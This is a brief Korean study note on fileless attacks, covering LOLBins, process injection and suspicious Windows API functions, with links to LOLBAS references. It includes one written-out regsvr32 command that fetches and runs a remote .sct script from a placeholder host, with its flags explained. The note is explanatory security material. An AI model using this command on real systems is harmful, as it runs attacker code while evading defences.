표적 공격

파일리스 공격

 : 실행되는 코드가 파일로 생성되지 않고 메모리에만 존재하며(DLL, EXE) 흔적을 남기 지 않는 공격

--> 목표는 디스크를 쓰지 않고 공격하겠다.

  특징

• 프로셋 인젝션 기술 사용
• LoL(Living off the Land)바이너리들을 사용

마이터어택 프레임워크로 공격이 어려워지니 공격자들이 이미 운영체제에 있는 바이너리, 스크립트, 그리고 라이브러리 등을 이용해 공격한다. 이를 LOLBINS 공격이라함.

[regsvr32.exe : DLL과 ActiveX를 등록하거나 등록해지하는데 사용되는 프로그램]

regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
다음과 같이 외부 호스트에서 .sct파일을 불러오고 내장된 script로 실행
/s : 어떠한 메시지 박스도 디스플레이 하지 않음
/n : DLL 등록 서버를 호출하지 않음
/I : 등록될 DLL에게 전달될 명령라인 파라미터 혹은 옵션
/u : DLL을 서비스로 등록 하지 않음

[mshta.exe : html application을 실행시킴]

[rundll32.exe : dll을 실행시킴]

• 스크립팅
• 파일리스 퍼시스턴스(persistence)

안티 바이러스 입장 - regsvr32.exe가 잠깐 실행됐다가 종료되어 정상인지 악성인지 파악하기 어려움

 

프로세스 인젝션

 : 정상적인 프로세스의 유저 메모리 영역에 악성 코드를 주입한 후 실행하는 공격

악성 dll을 주입 후 실행된 프로세스는 삭제됨.

 

프로세스 인젝션 의심 함수[VirtualAllocEx, WriteProcessMemory..]

 

 

참고

https://lolbas-project.github.io/

https://www.xn--hy1b43d247a.com/execution/lolbas